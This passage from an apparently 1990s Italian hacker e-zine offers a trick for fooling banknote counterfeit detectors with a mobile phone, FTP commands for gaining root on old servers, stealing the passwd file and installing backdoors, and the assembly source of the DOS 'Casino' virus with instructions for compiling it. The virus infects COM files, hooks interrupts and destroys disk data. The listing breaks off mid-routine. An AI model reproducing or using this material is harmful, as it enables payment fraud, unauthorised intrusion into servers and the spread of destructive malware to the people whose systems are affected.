ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Ho trovato una simpatica applicazione del cellulare GSM (non so se funziona anche con i TACS) quando volete pagare i vostri acquisti con della carta straccia ma il negoziante ha il rivelatore di banconote false. Mi riferisco al rivelatore di inchiostro magnetico, che porta nella sua parte anteriore una testina del tutto simile a quella dei lettori di audiocassette. Bene, se PRIMA che venga testata la banconota, accendete il telefonino e componete un numero, assicuratevi che il telefonino si COLLEGHI con quel numero e ... badabem badabem! il rivelatore di banconote riconoscera' la carta straccia come se fosse denaro vero e suonera' il fatidico beep. Questo avviene perche' la testina del rivelatore intercetta le variazioni del campo magnetico prodotte dal cellulare, e quindi suona anche se lo puntate in aria :) Ora, ATTENZIONE. Il cellulare deve trovarsi in un area di circa 1 - 1,5 metri dal rivelatore di banconote (forse anche di piu', dipende dalla potenza in TX del vs. cello); e se volete chiamare un numero senza disturbare casa vostra o la vostra ragazza, se avete un cellulare TIM chiamate il 916 che e' gratuito! Ci sarebbe da fare ora una ricerca accurata sul modo in cui i DISTRIBUTORI AUTOMATICI con lettore di banconote discriminano le vere dalle false.... uhm.... magari si riescono a fottere anche quelli!!! Ciao! ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [Vecchi server... servono...] UnDeR CoNsTrUcTiOn ³ ³ [HaCkInG SeCtIoN] Articolo di: Li-Nux ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Okay, adesso vi mostrero' un trucco molto vecchio, che pero' funziona su molte vecchie universit… (soprattutto americane) !!! Provate, Provate, provate, ... VI ASSICURO !!! ANCORA FUNZIONA :) Tenete presente winzozz '95 ? No ?!? Quel sistema creato dalla Mi[r0s0ft... vabbŠ... non lo conoscete, comunque se vi capita di averlo andate nel prompt di MS-DOS, siete nella directory WINDOWS, scrivete: ftp ftp.universit…delcazzo.com (non credo ci sia bisogno di dirvi che dovete metterci l'hostname dell ftp vostro ?!? :) quando vi verr… chiesto login e password non mettete nulla, premete invio. OK, adesso scrivete: quote user ftp quote cwd ~root quote pass ftp 0kIz... cosa vorreste fare di bello in questo ftp ??? Entrare nella directory etc e prendere il file passwd :) FATELO !!! Se quello che avete fatto funziona e il server Š vecchiotto... AVETE ACCESSO ROOT !!! :))) Se questo trucco vi Š riuscito... sono felicissimo per voi !!! Adesso avete il vostro accesso root, la shellina, vi fate delle backdoor, insomma vi divertirete un sacco :) ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [CaSiNo... vi fara' tremare] UnDeR CoNsTrUcTiOn ³ ³ [ViRiI SeCtIoN] Articolo di: Li-Nux ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Virii la piu' bella passione esistente !!! Questo non Š esattamente un articolo... ma il codice sorgente con i commenti in inglese di uno dei virus che ha fatto tremare i computer, quando lo si ha, bisogna essere molto fortunati per rimuoverlo... voi direte, ma che cazzo dice questo stronzo, con un antivirus lo tolgo... non so se ne avrete il tempo... Quando il virus Casino, vi far… giocare con lui avrete 1/16 di possibilit… che il virus se ne va completamente, ecco il nome Casino', la cosa bella Š che non potete resettare in modo piu' assoluto il computer, perchŠ canceller… tutti i dati !!! -------------------------------------------------------------------- |----- ECCO A VOI IL CODICE SORGENTE !!!!! -----| ------------------------------------------------------------------------------ ATTENZIONE !!! SE COMPILATE IL VIRUS DOVRETE CANCELLARE L'INTRODUZIONE FINO ALLA RIGA SUCCESSIVA A QUESTA. ------------------------------------------------------------------------------ PAGE 59,132 ;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ;ÛÛ ÛÛ ;ÛÛ CASINO ÛÛ ;ÛÛ ÛÛ ;ÛÛ Created: 31-Aug-90 ÛÛ ;ÛÛ Version: ÛÛ ;ÛÛ Passes: 9 Analysis Options on: H ÛÛ ;ÛÛ Copyright S & S International, 1990 ÛÛ ;ÛÛ ÛÛ ;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ data_1e equ 60Ch ; (0000:060C=0) data_2e equ 60Dh ; (0000:060D=0) data_3e equ 60Eh ; (0000:060E=0) data_4e equ 60Fh ; (0000:060F=0) data_5e equ 610h ; (0000:0610=0) data_6e equ 611h ; (0000:0611=0) data_7e equ 612h ; (0000:0612=0) data_8e equ 2 ; (6AE6:0002=0) data_10e equ 3Bh ; (6AE6:003B=0) data_11e equ 3Dh ; (6AE6:003D=0) data_12e equ 3Fh ; (6AE6:003F=0) data_13e equ 40h ; (6AE6:0040=0) data_14e equ 41h ; (6AE6:0041=0) data_15e equ 43h ; (6AE6:0043=6AE6h) data_16e equ 45h ; (6AE6:0045=0) data_17e equ 47h ; (6AE6:0047=6AE6h) data_18e equ 4Dh ; (6AE6:004D=0) data_19e equ 68h ; (6AE6:0068=0) data_20e equ 7Eh ; (6AE6:007E=0) data_21e equ 80h ; (6AE6:0080=0) data_33e equ 716Eh ; (6AE6:716E=0) seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h casino proc far start: nop data_23 db 0E9h data_24 db 48h data_25 db 7, 'ello - Copyright S & S Intern' db 'ational, 1990', 0Ah, 0Dh, '$' db 1Ah db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AA' db 0E6h db 'jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' casino endp ;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ; ; External Entry Point ; ;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ int_24h_entry proc far inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx inc cx mov ah,9 mov dx,offset data_25 ; (6AE6:0103=7) int 21h ; DOS Services ah=function 09h ; display char string at ds:dx int 20h ; Program Terminate db 0, 0, 0, 0, 0, 0Fh db 0, 0, 0E9h, 0D3h, 1, 0E9h db 0, 0, 0, 90h, 0E9h, 78h db 2Ah, 2Ah, 2Eh, 43h, 4Fh, 4Dh db 0 db 'C:\COMMAND.COM' db 0, 43h, 4Fh, 4Dh, 4Dh, 41h db 4Eh, 44h, 0FFh db 2Eh, 43h, 4Fh, 4Dh db 15 dup (0) db 3Fh, 0, 0F0h, 3, 2, 0 db 0B3h, 4Bh, 0FCh, 91h, 56h, 5 db 79h, 10h, 0, 0, 0, 0 db 0, 3 db 8 dup (3Fh) db 43h, 4Fh, 4Dh, 3Fh, 8, 0 db 1Eh, 2, 2Eh, 8Bh, 26h, 68h db 20h, 0A9h, 8Eh, 1Fh, 15h, 0E8h db 3, 0, 0 db 'H1000.COM' db 9 dup (0) db 1Fh, 15h, 0A9h, 8Eh, 90h, 90h db 3Dh, 59h, 4Bh, 75h, 4, 0B8h db 66h, 6, 0CFh, 80h, 0FCh, 11h db 74h, 8, 80h, 0FCh, 12h, 74h db 3, 0EBh, 51h, 90h loc_2: cmp al,66h ; 'f' je loc_4 ; Jump if equal mov al,66h ; 'f' int 21h ; DOS Services ah=function 09h ; display char string at ds:dx push ax push bx push cx push dx push es mov ah,2Fh ; '/' int 21h ; DOS Services ah=function 2Fh ; get DTA ptr into es:bx mov al,es:[bx+10h] cmp al,43h ; 'C' jne loc_3 ; Jump if not equal mov al,es:[bx+11h] cmp al,4Fh ; 'O' jne loc_3 ; Jump if not equal mov al,es:[bx+12h] cmp al,4Dh ; 'M' jne loc_3 ; Jump if not equal mov ax,es:[bx+24h] cmp ax,91Ah jb loc_3 ; Jump if below sub ax,91Ah mov cx,ax push cx mov cx,10h mov dx,0 div cx ; ax,dx rem=dx:ax/reg pop cx cmp dx,0 jne loc_3 ; Jump if not equal mov es:[bx+24h],cx loc_3: pop es pop dx pop cx pop bx pop ax iret ; Interrupt return int_24h_entry endp loc_4: push ax push bx push cx push dx push si push di push bp push ds push es mov bx,cs mov ds,bx mov al,0 mov ds:data_18e,al ; (6AE6:004D=0) mov al,ds:data_13e ; (6AE6:0040=0) cmp al,0FFh jne loc_5 ; Jump if not equal jmp loc_15 ; (06B2) loc_5: mov al,0FFh mov ds:data_13e,al ; (6AE6:0040=0) cmp ah,4Bh ; 'K' je loc_6 ; Jump if equal cmp ah,36h ; '6' je loc_7 ; Jump if equal jmp loc_15 ; (06B2) loc_6: mov ah,19h int 21h ; DOS Services ah=function 19h ; get default drive al (0=a:) mov ds:data_12e,al ; (6AE6:003F=0) jmp short loc_8 ; (0624) db 90h loc_7: mov ah,19h int 21h ; DOS Services ah=function 19h ; get default drive al (0=a:) mov ds:data_12e,al ; (6AE6:003F=0) cmp dl,0 je loc_8 ; Jump if equal dec dl mov ah,0Eh int 21h ; DOS Services ah=function 0Eh ; set default drive dl (0=a:) loc_8: mov ah,19h int 21h ; DOS Services ah=function 19h ; get default drive al (0=a:) cmp al,1 ja loc_9 ; Jump if above mov ch,0 push ds pop es mov bx,917h mov al,1 call sub_3 ; (07DB) mov al,1 call sub_4 ; (07EC) cmp ah,0 je loc_9 ; Jump if equal jmp short loc_14 ; (069C) db 90h loc_9: mov ah,2Fh ; '/' int 21h ; DOS Services ah=function 2Fh ; get DTA ptr into es:bx mov ds:data_14e,bx ; (6AE6:0041=0) mov ds:data_15e,es ; (6AE6:0043=6AE6h) mov dx,4Eh mov ah,1Ah int 21h ; DOS Services ah=function 1Ah ; set DTA to ds:dx mov dx,0Bh mov cx,3Fh mov ah,4Eh ; 'N' int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_14 ; Jump if carry Set mov dx,6Ch call sub_1 ; (06EE) cmp dl,1 jne loc_10 ; Jump if not equal call sub_2 ; (073C) jmp short loc_14 ; (069C) db 90h loc_10: cmp dl,3 je loc_11 ; Jump if equal jmp short loc_14 ; (069C) db 90h loc_11: mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jnc loc_12 ; Jump if carry=0 jmp short loc_14 ; (069C) db 90h loc_12: mov dx,6Ch call sub_1 ; (06EE) cmp dl,1 jne loc_13 ; Jump if not equal call sub_2 ; (073C) jmp short loc_14 ; (069C) db 90h loc_13: cmp dl,3 je loc_11 ; Jump if equal loc_14: mov dl,ds:data_12e ; (6AE6:003F=0) mov ah,0Eh int 21h ; DOS Services ah=function 0Eh ; set default drive dl (0=a:) mov dx,ds:data_14e ; (6AE6:0041=0) mov bx,ds:data_15e ; (6AE6:0043=6AE6h) mov ds,bx mov ah,1Ah int 21h ; DOS Services ah=function 1Ah ; set DTA to ds:dx loc_15: mov ah,0 mov ds:data_13e,ah ; (6AE6:0040=0) pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax ;* jmp far ptr loc_1 ;*(0273:1460) db 0EAh, 60h, 14h, 73h, 2 db 8Ch, 0CAh, 83h, 0C2h, 10h, 8Eh db 0DAh, 0BAh, 20h, 0, 0B4h, 41h db 0CDh, 21h, 0B8h, 21h, 35h, 0CDh db 21h, 8Ch, 6, 0D4h, 1, 89h db 1Eh, 0D2h, 1, 0BAh, 82h, 0 db 0B8h, 21h, 25h, 0CDh, 21h, 0BAh db 1Bh, 0Ch, 0CDh db 27h ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ sub_1 proc near mov ax,ds:data_19e ; (6AE6:0068=0) cmp ax,0F5B9h ja loc_20 ; Jump if above mov ax,4300h int 21h ; DOS Services ah=function 43h ; get/set file attrb, nam@ds:dx test cl,4 jnz loc_20 ; Jump if not zero test cl,1 jz loc_16 ; Jump if zero and cl,0FEh mov ax,4301h int 21h ; DOS Services ah=function 43h ; get/set file attrb, nam@ds:dx loc_16: mov ax,3D02h int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax mov dx,3 mov cx,1 mov ah,3Fh ; '?' int 21h ; DOS Services ah=function 3Fh ; read file, cx=bytes, to ds:dx jnc loc_17 ; Jump if carry=0 jmp short loc_19 ; (0732) db 90h loc_17: cmp ax,0 jne loc_18 ; Jump if not equal jmp short loc_19 ; (0732) db 90h loc_18: mov al,byte ptr ds:data_8e+1 ; (6AE6:0003=0) cmp al,90h jne loc_21 ; Jump if not equal loc_19: mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle loc_20: mov dl,3 retn loc_21: mov dl,1 retn sub_1 endp ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ sub_2 proc near mov ax,5700h int 21h ; DOS Services ah=function 57h ; get/set file date & time mov ds:data_20e,dx ; (6AE6:007E=0) mov ds:data_21e,cx ; (6AE6:0080=0) push bx call sub_5 ; (07FD) mov bx,68h mov ax,[bx] mov dx,0 mov bx,10h div bx ; ax,dx rem=dx:ax/reg inc ax mov ds:data_10e,ax ; (6AE6:003B=0) mul bx ; dx:ax = reg * ax mov ds:data_11e,ax ; (6AE6:003D=0) pop bx mov cx,ds:data_10e ; (6AE6:003B=0) mov si,35Fh mov [si],cx mov cx,0 mov dx,0 mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, cx,dx=offset mov dx,605h mov cx,4 mov ah,3Fh ; '?' int 21h ; DOS Services ah=function 3Fh ; read file, cx=bytes, to ds:dx mov cx,0 mov dx,ds:data_11e ; (6AE6:003D=0) mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, cx,dx=offset mov dx,0 mov cx,91Ah mov ah,40h ; '@' int 21h ; DOS Services ah=function 40h ; write file cx=bytes, to ds:dx cmp ax,cx jb loc_22 ; Jump if below mov al,ds:data_18e ; (6AE6:004D=0) cmp al,1 je loc_22 ; Jump if equal mov cx,0 mov dx,0 mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, cx,dx=offset mov si,9 mov ax,ds:data_11e ; (6AE6:003D=0) add ax,35Ch sub ax,4 mov [si],ax mov dx,7 mov cx,4 mov ah,40h ; '@' int 21h ; DOS Services ah=function 40h ; write file cx=bytes, to ds:dx loc_22: mov dx,ds:data_20e ; (6AE6:007E=0) mov cx,ds:data_21e ; (6AE6:0080=0) mov ax,5701h int 21h ; DOS Services ah=function 57h ; get/set file date & time mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle call sub_6 ; (0813) retn sub_2 endp ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ sub_3 proc near push ax mov ah,19h int 21h ; DOS Services ah=function 19h ; get default drive al (0=a:) mov dl,al pop ax mov dh,0 mov cl,1 mov ah,2 int 13h ; Disk dl=drive #: ah=func b2h ; read sectors to memory es:bx retn sub_3 endp ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ sub_4 proc near push ax mov ah,19h int 21h ; DOS Services ah=function 19h ; get default drive al (0=a:) mov dl,al pop ax mov dh,0 mov cl,1 mov ah,3 int 13h ; Disk dl=drive #: ah=func b3h ; write sectors from mem es:bx retn sub_4 endp ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ sub_5 proc near mov ax,3524h int 21h ; DOS Services ah=function 35h ; get intrpt vector al in es:bx mov ds:data_16e,bx ; (6AE6:0045=0) mov ds:data_17e,es ; (6AE6:0047=6AE6h) mov dx,335h mov ax,2524h int 21h ; DOS Services ah=function 25h ; set intrpt vector al to ds:dx retn sub_5 endp ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ sub_6 proc near mov dx,ds:data_16e ; (6AE6:0045=0) mov cx,ds:data_17e ; (6AE6:0047=6AE6h) push ds push cx pop ds mov ax,2524h int 21h ; DOS Services ah=function 25h ; set intrpt vector al to ds:dx pop ds retn sub_6 endp db 50h, 53h, 51h, 52h, 1Eh, 6 db 0B4h, 0, 0CDh, 13h, 0B4h, 1 db 88h, 26h, 4Dh, 0, 0BFh, 0FFh db 0FFh, 8Eh, 6, 49h, 0, 8Bh db 1Eh, 4Bh, 0, 0B0h, 0, 26h db 88h, 7, 7, 1Fh, 5Ah, 59h db 5Bh, 58h, 0CFh, 8Ch, 0CAh, 0B9h db 3Fh, 0, 3, 0D1h, 83h, 0C2h db 10h, 8Eh, 0DAh, 0A1h, 3Dh, 0 db 5, 3, 6, 0BBh, 0FEh, 0FFh db 2Bh, 0D8h, 89h, 1Eh, 3, 6 db 0BBh, 5, 6, 8Ah, 7, 2Eh db 0A2h, 0, 1, 43h, 8Ah, 7 db 2Eh, 0A2h, 1, 1, 43h, 8Ah db 7, 2Eh, 0A2h, 2, 1, 43h db 8Ah, 7, 2Eh, 0A2h, 3, 1 db 0B4h, 2Ah, 0CDh, 21h, 80h, 0FAh db 0Fh, 74h, 3, 0E9h, 0A2h, 1 loc_23: cmp dh,1 je loc_24 ; Jump if equal cmp dh,4 je loc_24 ; Jump if equal cmp dh,8 je loc_24 ; Jump if equal jmp loc_36 ; (0A33) loc_24: call sub_8 ; (09EB) push ds pop es mov si,613h mov di,613h mov cx,305h cld ; Clear direction locloop_25: lodsb ; String [si] to al sub al,64h ; 'd' stosb ; Store al to es:[di] loop locloop_25 ; Loop if cx > 0 mov dx,613h mov ah,9 int 21h ; DOS Services ah=function 09h ; display char string at ds:dx loc_26: mov ah,7 int 21h ; DOS Services ah=function 07h ; get keybd char al, no echo mov byte ptr ds:data_2e,64h ; (0000:060D=0) 'd' nop mov byte ptr ds:data_3e,78h ; (0000:060E=0) 'x' nop mov byte ptr ds:data_4e,0B4h ; (0000:060F=0) nop mov ah,2Ch ; ',' int 21h ; DOS Services ah=function 2Ch ; get time, cx=hrs/min, dh=sec mov bl,dh mov bh,0 mov ch,0 mov dh,0 add cl,dl mov ax,cx mov cl,3 div cl ; al, ah rem = ax/reg mov ds:data_5e,ah ; (0000:0610=0) mov ax,dx mov dl,3 div dl ; al, ah rem = ax/reg mov ds:data_6e,ah ; (0000:0611=0) mov ax,bx div dl ; al, ah rem = ax/reg mov ds:data_7e,ah ; (0000:0612=0) dec byte ptr ds:data_1e ; (0000:060C=0) mov al,ds:data_1e ; (0000:060C=0) add al,30h ; '0' mov dh,0Dh mov dl,26h ; '&' mov bx,0 mov ah,2 int 10h ; Video display ah=functn 02h ; set cursor location in dx mov ah,0Eh int 10h ; Video display ah=functn 0Eh ; write char al, teletype mode loc_27: mov dx,1FFFh loc_28: nop nop nop dec dx jnz loc_28 ; Jump if not zero mov al,ds:data_2e ; (0000:060D=0) cmp al,ds:data_5e ; (0000:0610=0) je loc_29 ; Jump if equal mov dl,19h mov al,ds:data_2e ; (0000:060D=0) call sub_7 ; (09C9) mov al,ds:data_2e ; (0000:060D=0) dec al mov ds:data_2e,al ; (0000:060D=0) loc_29: mov al,ds:data_3e ; (0000:060E=0) cmp al,ds:data_6e ; (0000:0611=0) je loc_30 ; Jump if equal mov dl,21h ; '!' mov al,ds:data_3e ; (0000:060E=0) call sub_7 ; (09C9) dec byte ptr ds:data_3e ; (0000:060E=0) loc_30: mov al,ds:data_4e ; (0000:060F=0) cmp al,ds:data_7e ; (0000:0612=0) je loc_31 ; Jump if equal mov dl,29h ; ')' mov al,ds:data_4e ; (0000:060F=0) call sub_7 ; (09C9) dec byte ptr ds:data_4e ; (0000:060F=0) loc_31: mov al,ds:data_4e ; (0000:060F=0) cmp al,ds:data_7e ; (0000:0612=0) jne loc_27 ; Jump if not equal mov ah,ds:data_3e ; (0000:060E=0) cmp ah,ds:data_6e ; (0000:0611=0) jne loc_27 ; Jump if not equal mov bl,ds:data_2e ; (0000:060D=0) cmp bl,ds:data_5e ; (0000:0610=0) jne loc_27 ; Jump if not equal cmp al,0 jne loc_32 ; Jump if not equal cmp ah,0 jne loc_32 ; Jump if not equal cmp bl,0 jne loc_32 ; Jump if not equal mov dx,80Ah mov ah,9 int 21h ; DOS Services ah=function 09h ; display char string at ds:dx call sub_9 ; (0A18) jmp short loc_35 ; (09C7) db 90h loc_32: cmp al,1 jne loc_33 ; Jump if not equal cmp ah,1 jne loc_33 ; Jump if not equal cmp bl,1 jne loc_33 ; Jump if not equal mov dx,88Dh mov ah,9 int 21h ; DOS Services ah=function 09h ; display char string at ds:dx jmp short loc_34 ; (09BD) db 90h loc_33: mov al,ds:data_1e ; (0000:060C=0) cmp al,0 je loc_34 ; Jump if equal jmp loc_26 ; (08BF) loc_34: mov dx,8D6h mov ah,9 int 21h ; DOS Services ah=function 09h ; display char string at ds:dx jmp short loc_35 ; (09C7) nop loc_35: jmp short loc_35 ; (09C7) ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; SUBROUTINE ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ sub_7 proc near mov ah,0 push ax mov dh,0Bh mov ah,2 mov bh,0 int 10h ; Video display ah=functn 02h ; set cursor location in dx pop ax mov bl,3 div bl ; al, ah rem = ax/reg mov bl,ah mov bh,0 